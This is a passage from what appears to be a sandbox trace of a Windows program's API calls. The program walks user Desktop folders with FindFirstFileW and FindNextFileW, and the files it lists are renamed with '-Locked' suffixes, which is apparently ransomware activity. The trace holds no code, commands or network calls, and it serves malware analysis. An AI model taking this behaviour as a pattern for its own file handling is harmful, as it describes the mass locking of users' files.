FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364167a2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364167a2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364167a2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked-Locked", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0305.165] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0305.165] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3641ef6c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3641ef6c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3641ef6c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked-Locked", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0305.165] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0305.166] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36425180, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36425180, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36425180, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked-Locked", cAlternateFileName="MYZQDK~2.MP3")) returned 1 [0305.166] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0305.166] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3642edd9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3642edd9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3642edd9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked-Locked", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0305.173] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0305.173] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364363bc, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364363bc, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364363bc, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked-Locked", cAlternateFileName="OQWYTP~2.BMP")) returned 1 [0305.173] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0305.173] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364439d9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364439d9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364439d9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked-Locked", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0305.174] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0305.174] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3644aec5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3644aec5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3644aec5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked-Locked", cAlternateFileName="SONI~2.JPG")) returned 1 [0305.174] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0305.174] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36452403, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36452403, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36452403, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked-Locked", cAlternateFileName="STLRGM~2.FLV")) returned 1 [0305.174] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0305.175] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364598c3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364598c3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364598c3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked-Locked", cAlternateFileName="TMHBBP~2.MP4")) returned 1 [0305.175] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0305.175] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3645fa98, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3645fa98, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3645fa98, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked-Locked", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0305.175] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0305.176] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x364649d0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x364649d0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x364649d0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked-Locked", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0305.176] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0305.176] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36476736, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36476736, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36476736, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked-Locked", cAlternateFileName="VL-8WX~2.PNG")) returned 1 [0305.177] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0305.177] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3647dc3b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3647dc3b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3647dc3b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked-Locked", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0305.177] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0305.177] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0305.177] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36485145, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36485145, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked-Locked", cAlternateFileName="Y4HQQH~1.PDF")) returned 0 [0305.178] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0305.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af168) returned 1 [0305.178] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj", lpFilePart=0x0) returned 0x2f [0305.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0305.179] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj", lpFilePart=0x0) returned 0x2f [0305.179] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\", lpFilePart=0x0) returned 0x30 [0305.179] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.179] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.179] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3291f58f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3291f58f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3291f58f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E ZB4hlMv59fpDjUh6qT.m4a-Locked", cAlternateFileName="EZB4HL~2.M4A")) returned 1 [0305.180] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32932f7c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32932f7c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32932f7c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eKq_zA-WA.mkv-Locked", cAlternateFileName="EKQ_ZA~2.MKV")) returned 1 [0305.180] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32942c61, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32942c61, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32942c61, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iTP31jJvGR0dsUQ.wav-Locked", cAlternateFileName="ITP31J~2.WAV")) returned 1 [0305.180] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329516ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329516ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329516ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ixYbal.avi-Locked", cAlternateFileName="IXYBAL~1.AVI")) returned 1 [0305.180] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32963be4, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32963be4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32963be4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S sEwkyDOda_C3BxCH.ppt-Locked", cAlternateFileName="SSEWKY~2.PPT")) returned 1 [0305.180] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3297399a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3297399a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3297399a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ujk4snw9z16p4ofDz.mp4-Locked", cAlternateFileName="UJK4SN~2.MP4")) returned 1 [0305.180] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32986238, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32986238, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32986238, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf-Locked", cAlternateFileName="YZL8R1~2.SWF")) returned 1 [0305.181] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0305.181] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0305.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0305.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0305.181] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj", lpFilePart=0x0) returned 0x2f [0305.181] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\", lpFilePart=0x0) returned 0x30 [0305.181] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.182] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.182] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3291f58f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3291f58f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3291f58f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E ZB4hlMv59fpDjUh6qT.m4a-Locked", cAlternateFileName="EZB4HL~2.M4A")) returned 1 [0305.182] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32932f7c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32932f7c, 